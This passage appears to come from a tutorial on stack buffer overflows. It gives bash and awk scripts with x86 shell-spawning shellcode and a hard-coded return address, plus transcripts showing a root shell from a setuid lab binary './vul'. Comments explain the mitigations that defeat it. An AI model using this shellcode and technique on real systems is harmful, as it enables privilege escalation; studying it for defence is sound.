[cloud@test]$ cat ex.sh
#/bin/bash
# NOTE(review): the line above is missing the "!" — "#/bin/bash" is not a
# valid shebang. Run as ./ex.sh it only works because the invoking shell falls
# back to interpreting the file itself; a bash script should start "#!/bin/bash".
# Demo for exploiting a stack buffer overflow in "./vul"
# Written by watercloud @ xfocus.org
#
# Educational note: this is the classic stack-smashing pattern — an oversized
# argument overwrites a saved return address with a hard-coded stack address
# (0xbffff3e8 below) that points into data the caller placed in memory. It
# relies on a predictable stack layout and an executable stack; ASLR, a
# non-executable stack (NX) and stack canaries, all default on modern systems,
# each break it. The shell obtained in the transcript runs as uid 0, so ./vul
# is presumably setuid-root — the defect to fix is the unchecked copy inside
# ./vul (it appears to echo its argument as "buff : ..."), not the harness.
#ENV_LEN=`env |wc -c|tr -d ' '`
# Payload bytes written as \x escapes; "echo -e" decodes them further down.
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
# Filler: "AA" doubled 10 times is 2048 chars, tripled is 6144.
AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG # 2*2^10*3 = 6144 chars (original comment said 3096)
# 20 copies of the four bytes of the hard-coded stack address 0xbffff3e8
# (ex.awk writes the same bytes in little-endian order \xe8\xf3\xff\xbf; here
# they are rotated). Repeating the value and varying the "A" prefix below
# tolerates small errors in where the saved return address actually sits.
for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8
# Filler + decoded payload go into the environment, which ./vul inherits.
# $SH is expanded unquoted: this only works because the payload contains no
# IFS whitespace and no glob pattern that matches a file in the cwd.
export AGSHELL=$AG`echo -e $SH`
# Try prefixes of 1..4 "A"s. "if ./vul" leaves the loop as soon as ./vul
# exits 0: in the transcript the first run segfaults (non-zero, loop
# continues) and the second spawns the shell, which exits 0 on "exit".
for((i=0;i<4;i++)) ;do
AA=$AA"A"
if ./vul $AA`echo -e $AD`
then break
fi
done
#EOF
[cloud@test]$ chmod a+x ex.sh
[cloud@test]$ ./ex.sh
buff : A�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?
�胯?胯?
./ex.sh: line 16: 5287 段错误 ./vul $AA`echo -e $AD`
buff : AA�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯
?胯?胯?
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
<五> awk语言版本利用程序ex.awk
[cloud@test]$ cat ex.awk
# Demo for exploiting a stack buffer overflow in "./vul" (awk port of ex.sh)
# Written by watercloud @ xfocus.org
#
# Educational note: same classic stack smash as ex.sh — it assumes a
# predictable stack address (0xbffff3e8) and an executable stack, so ASLR,
# NX and stack canaries each defeat it. Unlike ex.sh, the filler and payload
# are passed as a second command-line argument instead of through the
# environment. Invoked as "gawk -f ex.awk /dev/null"; because the program is
# only a BEGIN action awk reads no input, so the /dev/null argument is
# harmless but unnecessary.
BEGIN{
# Payload bytes as \x escapes; gawk decodes them inside string constants.
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";
# Filler: "AA" doubled 10 times is 2048 chars; tripled below, 6144.
for ( i=0;i<10;i++)
{
AG=AG""AG; # adjacency is string concatenation in awk
}
AG=AG""AG""AG # 2*2^10*3 = 6144 chars (original comment said 3096)
# 20 copies of 0xbffff3e8 in little-endian byte order (ex.sh emits the same
# four bytes rotated). AD is never initialised; awk treats it as "" here.
for(i=0;i<20;i++)
{
AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8
}
AA="AA"
# Prefixes of 3..6 "A"s (ex.sh starts from a single "A"). system() hands the
# whole line to /bin/sh -c, so the raw bytes also go through a shell parse.
# There is no break: all four attempts run regardless; the transcript shows
# the second one yielding the shell.
for(i=0;i<4;i++)
{
AA=AA"A"
system("./vul "AA""AD" "AG""SH)
}
}
#EOF
[cloud@test]$ gawk -f ex.awk /dev/null
buff : AAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??
buff : AAAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b#